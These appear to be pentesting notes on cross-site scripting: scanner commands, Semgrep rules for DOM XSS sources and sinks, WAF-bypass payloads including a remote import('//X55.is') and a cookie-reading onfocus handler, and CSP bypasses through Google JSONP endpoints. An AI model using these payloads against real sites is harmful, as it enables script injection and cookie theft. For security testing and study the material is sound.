XSS
# https://github.com/hahwul/dalfox
dalfox url http://example.com
cat urls | dalfox pipe - --skip-bav --skip-mining-all
Find reflected parameters that could lead to XSS with Gxss
# https://github.com/KathanP19/Gxss
cat list | Gxss -c 100 -p REPLACE_STRING
Semgrep
Semgrep can be used to detect sink and sources and assist in XSS detection.
Usage
Download javascript files and beautify them (See Javascript), then run semgrep with
semgrep -c xss.yaml scripts/*
Hold down!
Javascript files must be beautified, otherwise semgrep will no work properly.
rules:
- id: domxss-insertAdjacentHTML
languages:
- javascript
- typescript
message: Found dangerous HTML output
pattern-either:
- pattern: document.location.search = ...
- pattern: document.location.hash = ...
- pattern: document.location.pathname = ...
- pattern: window.location.search = ...
- pattern: window.location.hash = ...
- pattern: window.location.pathname = ...
- pattern: document.URL = ...
- pattern: document.documentURI = ...
- pattern: document.baseURI = ...
- pattern: document.cookie = ...
- pattern: document.referrer = ...
- pattern: $X.insertAdjacentHTML(...)
- pattern: $X.innerHTML(...)
- pattern: $X.innerHTML = ...
- pattern: eval(...)
- pattern: execScript
- pattern: script.src = ...
- pattern: iframe.src = ...
- pattern: document.location = ...
- pattern: window.location = ...
- pattern: document.location.href = ...
- pattern: window.location.href = ...
- pattern: document.write(...)
- pattern: document.writeln(...)
- pattern: $X.outerHTML = ...
- pattern: $X.outerHTML(...)
severity: WARNING
rules:
- id: domxss-insertAdjacentHTML
languages:
- javascript
- typescript
message: Found dangerous HTML output
mode: taint
pattern-sources:
- pattern: document.location.search
- pattern: document.location.hash
- pattern: document.location.pathname
- pattern: document.location.href
- pattern: document.location
- pattern: window.location
- pattern: window.location.href
- pattern: window.location.search
- pattern: window.location.hash
- pattern: window.location.pathname
- pattern: document.URL
- pattern: document.documentURI
- pattern: document.baseURI
- pattern: document.cookie
- pattern: document.referrer
pattern-sinks:
- pattern: $X.insertAdjacentHTML(...)
- pattern: $X.innerHTML(...)
- pattern: $X.innerHTML = ...
- pattern: eval(...)
- pattern: execScript
- pattern: script.src = ...
- pattern: iframe.src = ...
- pattern: document.location = ...
- pattern: window.location = ...
- pattern: document.location.href = ...
- pattern: window.location.href = ...
- pattern: document.write(...)
- pattern: document.writeln(...)
- pattern: $X.outerHTML = ...
- pattern: $X.outerHTML(...)
severity: WARNING
Markdown
Markdown parsers can lead to XSS
Bypass
alert(1) would become ale\u{72}t(1\x29, where
unicode: \u{72} -> r \x29 -> to ) \u003e -> > \u003c -> <
WAF Bypass
<a/\test="%26quot"href=%27javascript:/**/;\ale\u{72}t(11111\x29");%27>Click
<a/\test="%26quot;x%26quot;"href=%27javascript:/**/;location.assign("google.com")%27>Click</a>
<input/\x3e/autofocus/onfocus=[document['cookie']].findIndex(alert)>
import('//X55.is')
(function(x){this[x+`ert`](1)})`al`
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)
parent[/al/.source+/ert/.source](1) //without spaces and quotes
parent[/al/.source.concat(/ert/.source)](2) //without spaces, quotes, + sign
alert;throw 1
alert`1`
Enconding
CSP Bypass
If the site has google whitelisted, the following could be used:
www.google.com/complete/search?client=chrome&q=1&jsonp=alert(1)//
accounts.google.com/o/oauth2/revoke?callback=alert(1)
Cool resources
| URL | Description |
|---|---|
| https://xss.pwnfunction.com/ | pwnfunction XSS game |
| https://github.com/s0md3v/MyPapers/tree/master/Bypassing-XSS-detection-mechanisms | Bypass Mechanisms |
| https://htmlparse.hackaplaneten.se/ | Parser Issues |
| http://domloggerpp-workshop.mizu.re:5173/ | DOM XSS Labs |
| https://aszx87410.github.io/beyond-xss/en/ | great source |
| https://github.com/m4ll0k/XSS-Bypass-Filters | Bypass |
| https://marektoth.com/blog/xss-20-chars/ | < 20 chars |